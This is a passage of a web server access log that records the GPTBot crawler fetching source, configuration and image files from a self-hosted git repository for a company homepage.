"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +[17/Feb/2026:14:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +[17/Feb/2026:14:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11157] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" +[17/Feb/2026:14:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" [Client 74.7.227.38] [Length 23745] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +[17/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 11704] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14847] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15582] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14238] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" +[17/Feb/2026:14:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" +[17/Feb/2026:14:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10207] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets" +[17/Feb/2026:14:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14693] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components" +[17/Feb/2026:14:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" +[17/Feb/2026:14:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 10982] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" +[17/Feb/2026:14:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" +[17/Feb/2026:14:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13816] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" +[17/Feb/2026:14:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14991] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15934] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14330] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14594] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16944] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" +[17/Feb/2026:14:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" +[17/Feb/2026:14:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" +[17/Feb/2026:14:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" +[17/Feb/2026:14:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" +[17/Feb/2026:14:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" +[17/Feb/2026:14:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" +[17/Feb/2026:14:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" +[17/Feb/2026:14:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" +[17/Feb/2026:14:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" +[17/Feb/2026:14:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts?display=source" [Client 74.7.227.38] [Length 11499] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" +[17/Feb/2026:14:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" +[17/Feb/2026:14:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" +[17/Feb/2026:14:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 